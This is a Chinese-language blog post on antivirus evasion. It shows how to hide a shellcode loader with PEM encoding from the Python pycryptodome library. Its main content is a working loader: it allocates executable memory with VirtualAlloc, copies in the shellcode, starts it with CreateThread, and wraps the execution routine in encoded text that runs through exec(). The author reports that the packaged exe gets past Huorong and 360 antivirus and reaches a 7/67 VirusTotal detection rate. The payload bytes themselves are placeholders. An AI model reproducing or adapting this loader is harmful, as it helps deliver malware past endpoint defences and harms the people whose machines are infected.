<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.1.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"liaorj.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="免杀研究（1）Python加密混淆shellcode加密的方式有很多，例如Xor异或，Base64等等，其实加密算法不重要，重要的是一定要加密，本文将使用Python利用PyCrypto库对shellcode进行混淆测试。 pycryptodomePyCryptodome 是 PyCrypto 的一个分支。这是一个跟密码学相关的模块，可以实现各种加密方式的加解密。官方文档：https:&#x2F;&#x2F;pycr">
<meta property="og:type" content="article">
<meta property="og:title" content="免杀研究（1）Python加密混淆shellcode">
<meta property="og:url" content="https://liaorj.github.io/2022/04/13/%E5%85%8D%E6%9D%80%E7%A0%94%E7%A9%B6%EF%BC%881%EF%BC%89Python%E5%8A%A0%E5%AF%86%E6%B7%B7%E6%B7%86shellcode/index.html">
<meta property="og:site_name" content="LiAo的成长记录">
<meta property="og:description" content="免杀研究（1）Python加密混淆shellcode加密的方式有很多，例如Xor异或，Base64等等，其实加密算法不重要，重要的是一定要加密，本文将使用Python利用PyCrypto库对shellcode进行混淆测试。 pycryptodomePyCryptodome 是 PyCrypto 的一个分支。这是一个跟密码学相关的模块，可以实现各种加密方式的加解密。官方文档：https:&#x2F;&#x2F;pycr">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/LiAoRJ/pic/202204131635439.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/LiAoRJ/pic/202204131635472.png">
<meta property="article:published_time" content="2022-04-13T08:34:35.000Z">
<meta property="article:modified_time" content="2022-04-13T09:01:45.022Z">
<meta property="article:author" content="LiAoRJ">
<meta property="article:tag" content="免杀研究">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/LiAoRJ/pic/202204131635439.png">

<link rel="canonical" href="https://liaorj.github.io/2022/04/13/%E5%85%8D%E6%9D%80%E7%A0%94%E7%A9%B6%EF%BC%881%EF%BC%89Python%E5%8A%A0%E5%AF%86%E6%B7%B7%E6%B7%86shellcode/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>免杀研究（1）Python加密混淆shellcode | LiAo的成长记录</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">LiAo的成长记录</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">记录一下吧</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
        <li class="menu-item menu-item-schedule">

    <a href="/schedule/" rel="section"><i class="fa fa-fw fa-calendar"></i>日程表</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://liaorj.github.io/2022/04/13/%E5%85%8D%E6%9D%80%E7%A0%94%E7%A9%B6%EF%BC%881%EF%BC%89Python%E5%8A%A0%E5%AF%86%E6%B7%B7%E6%B7%86shellcode/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/author.jpg">
      <meta itemprop="name" content="LiAoRJ">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="LiAo的成长记录">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          免杀研究（1）Python加密混淆shellcode
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2022-04-13 16:34:35 / 修改时间：17:01:45" itemprop="dateCreated datePublished" datetime="2022-04-13T16:34:35+08:00">2022-04-13</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E5%85%8D%E6%9D%80%E7%A0%94%E7%A9%B6/" itemprop="url" rel="index"><span itemprop="name">免杀研究</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="免杀研究（1）Python加密混淆shellcode"><a href="#免杀研究（1）Python加密混淆shellcode" class="headerlink" title="免杀研究（1）Python加密混淆shellcode"></a>免杀研究（1）Python加密混淆shellcode</h1><p>加密的方式有很多，例如Xor异或，Base64等等，其实加密算法不重要，重要的是一定要加密，本文将使用Python利用PyCrypto库对shellcode进行混淆测试。</p>
<h2 id="pycryptodome"><a href="#pycryptodome" class="headerlink" title="pycryptodome"></a>pycryptodome</h2><p>PyCryptodome 是 PyCrypto 的一个分支。这是一个跟密码学相关的模块，可以实现各种加密方式的加解密。<br><strong>官方文档：</strong><a target="_blank" rel="noopener" href="https://pycryptodome.readthedocs.io/en/latest/src/introduction.html">https://pycryptodome.readthedocs.io/en/latest/src/introduction.html</a><br><strong>安装</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pip install pycryptodome -i https://pypi.douban.com/simple</span><br></pre></td></tr></table></figure>

<p><strong>API</strong></p>
<table>
<thead>
<tr>
<th>Package</th>
<th>Description</th>
</tr>
</thead>
<tbody><tr>
<td><a target="_blank" rel="noopener" href="https://pycryptodome.readthedocs.io/en/latest/src/cipher/cipher.html">Crypto.Cipher</a></td>
<td>用于加密和解密数据（例如：AES）。</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://pycryptodome.readthedocs.io/en/latest/src/signature/signature.html">Crypto.Signature</a></td>
<td>用于创建和验证消息的数字签名  （例如：PKCS#1 v1.5）。</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://pycryptodome.readthedocs.io/en/latest/src/hash/hash.html">Crypto.Hash</a></td>
<td>用于创建加密 <strong>摘要</strong>  （例如：SHA-256）。</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://pycryptodome.readthedocs.io/en/latest/src/public_key/public_key.html">Crypto.PublicKey</a></td>
<td>用于生成、导出或导入的模块  <em>公钥</em> （例如：RSA 或 ECC）。</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://pycryptodome.readthedocs.io/en/latest/src/protocol/protocol.html">Crypto.Protocol</a></td>
<td>促进安全通信的模块 各方之间，在大多数情况下通过利用密码原语 来自其他模块。</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://pycryptodome.readthedocs.io/en/latest/src/io/io.html">Crypto.IO</a></td>
<td>处理常用编码的模块 用于加密数据（例如：PEM）。</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://pycryptodome.readthedocs.io/en/latest/src/random/random.html">Crypto.Random</a></td>
<td>用于生成随机数据的模块。</td>
</tr>
<tr>
<td><a target="_blank" rel="noopener" href="https://pycryptodome.readthedocs.io/en/latest/src/util/util.html">Crypto.Util</a></td>
<td>通用（例如：XOR for byte 字符串）。</td>
</tr>
</tbody></table>
<h3 id="Crypto-IO-PEM"><a href="#Crypto-IO-PEM" class="headerlink" title="Crypto.IO.PEM"></a>Crypto.IO.PEM</h3><p>根据 PEM 格式封装数据的一组函数。</p>
<p>PEM（隐私增强邮件）是 IETF 标准，用于通过公钥基础设施保护电子邮件。它在 RFC 1421-1424 中指定。即使它已被放弃，它定义的简单消息封装今天仍然广泛用于将二进制加密对象（如密钥和证书）编码为文本。</p>
<p><strong>Crypto.IO.PEM.encode &amp; Crypto.IO.PEM.decode</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> Crypto.IO <span class="keyword">import</span> PEM</span><br><span class="line"></span><br><span class="line">buf = <span class="string">b&quot;&quot;</span></span><br><span class="line"><span class="comment"># 加密</span></span><br><span class="line"><span class="comment"># passphrase：可以指定密钥</span></span><br><span class="line"><span class="comment"># marker：自己指定名称</span></span><br><span class="line">buf = PEM.encode(buf, marker=<span class="string">&quot;shellcode&quot;</span>, passphrase=<span class="literal">None</span>, randfunc=<span class="literal">None</span>)</span><br><span class="line"><span class="comment"># 解密</span></span><br><span class="line">PEM.decode(buf, passphrase=<span class="literal">None</span>)</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> ctypes</span><br><span class="line"><span class="keyword">from</span> Crypto.IO <span class="keyword">import</span> PEM</span><br><span class="line"></span><br><span class="line"><span class="comment"># 加密后的shellcode</span></span><br><span class="line">buf = <span class="string">&quot;&quot;&quot; &quot;&quot;&quot;</span></span><br><span class="line"><span class="comment"># 解密</span></span><br><span class="line">shellcode = <span class="built_in">bytearray</span>(PEM.decode(buf, passphrase=<span class="literal">None</span>)[<span class="number">0</span>])</span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<p>执行上线试试</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> ctypes</span><br><span class="line"><span class="keyword">from</span> Crypto.IO <span class="keyword">import</span> PEM</span><br><span class="line"></span><br><span class="line"><span class="comment"># 加密</span></span><br><span class="line"><span class="comment">#buf = b&quot;&quot;</span></span><br><span class="line"><span class="comment">#passphrase：可以指定密钥</span></span><br><span class="line"><span class="comment">#marker：自己指定名称</span></span><br><span class="line"><span class="comment"># buf = PEM.encode(buf, marker=&quot;shellcode&quot;, passphrase=None, randfunc=None)</span></span><br><span class="line"><span class="comment"># print(buf)</span></span><br><span class="line"><span class="comment">#加密后</span></span><br><span class="line">buf = <span class="string">&quot;&quot;&quot;-----BEGIN shellcode-----</span></span><br><span class="line"><span class="string">XXXXX</span></span><br><span class="line"><span class="string">-----END shellcode-----&quot;&quot;&quot;</span></span><br><span class="line">shellcode = <span class="built_in">bytearray</span>(PEM.decode(buf, passphrase=<span class="literal">None</span>)[<span class="number">0</span>])</span><br><span class="line"></span><br><span class="line"><span class="comment">#execode加密前</span></span><br><span class="line"><span class="comment"># execode = PEM.encode(b&quot;&quot;&quot;ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64</span></span><br><span class="line"><span class="comment"># ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))</span></span><br><span class="line"><span class="comment"># buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)</span></span><br><span class="line"><span class="comment"># ctypes.windll.kernel32.RtlMoveMemory(</span></span><br><span class="line"><span class="comment">#     ctypes.c_uint64(ptr),</span></span><br><span class="line"><span class="comment">#     buf,</span></span><br><span class="line"><span class="comment">#     ctypes.c_int(len(shellcode))</span></span><br><span class="line"><span class="comment"># )</span></span><br><span class="line"><span class="comment"># handle = ctypes.windll.kernel32.CreateThread(</span></span><br><span class="line"><span class="comment">#     ctypes.c_int(0),</span></span><br><span class="line"><span class="comment">#     ctypes.c_int(0),</span></span><br><span class="line"><span class="comment">#     ctypes.c_uint64(ptr),</span></span><br><span class="line"><span class="comment">#     ctypes.c_int(0),</span></span><br><span class="line"><span class="comment">#     ctypes.c_int(0),</span></span><br><span class="line"><span class="comment">#     ctypes.pointer(ctypes.c_int(0))</span></span><br><span class="line"><span class="comment"># )</span></span><br><span class="line"><span class="comment"># ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))&quot;&quot;&quot;, marker=&quot;execcute code&quot;,</span></span><br><span class="line"><span class="comment">#                  passphrase=None, randfunc=None))</span></span><br><span class="line"><span class="comment">#execode加密后</span></span><br><span class="line">execode=<span class="string">&quot;&quot;&quot;-----BEGIN execcute code-----</span></span><br><span class="line"><span class="string">XXXXX</span></span><br><span class="line"><span class="string">-----END execcute code-----&quot;&quot;&quot;</span></span><br><span class="line"><span class="built_in">print</span>(PEM.decode(execode, passphrase=<span class="literal">None</span>)[<span class="number">0</span>].decode())</span><br><span class="line"><span class="built_in">exec</span>(PEM.decode(execode, passphrase=<span class="literal">None</span>)[<span class="number">0</span>].decode())</span><br></pre></td></tr></table></figure>

<p>这里我封装成exe测试下上线，可绕过火绒、360执行命令,如下图。</p>
<p><img src="https://cdn.jsdelivr.net/gh/LiAoRJ/pic/202204131635439.png"></p>
<p>virustotal查杀率7&#x2F;67 <strong>(测试时间2022年4月13日)</strong></p>
<p><img src="https://cdn.jsdelivr.net/gh/LiAoRJ/pic/202204131635472.png"></p>
<p>本文参考自<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/10999">免杀之代码混淆 - 先知社区 (aliyun.com)</a></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E5%85%8D%E6%9D%80%E7%A0%94%E7%A9%B6/" rel="tag"># 免杀研究</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item"></div>
      <div class="post-nav-item">
    <a href="/2022/04/14/SRC%E5%A7%BF%E5%8A%BF(%E4%B8%80)/" rel="next" title="SRC姿势(一)">
      SRC姿势(一) <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%85%8D%E6%9D%80%E7%A0%94%E7%A9%B6%EF%BC%881%EF%BC%89Python%E5%8A%A0%E5%AF%86%E6%B7%B7%E6%B7%86shellcode"><span class="nav-number">1.</span> <span class="nav-text">免杀研究（1）Python加密混淆shellcode</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#pycryptodome"><span class="nav-number">1.1.</span> <span class="nav-text">pycryptodome</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Crypto-IO-PEM"><span class="nav-number">1.1.1.</span> <span class="nav-text">Crypto.IO.PEM</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="LiAoRJ"
      src="/images/author.jpg">
  <p class="site-author-name" itemprop="name">LiAoRJ</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">3</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/LiAoRJ" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;LiAoRJ" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">LiAoRJ</span>
</div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
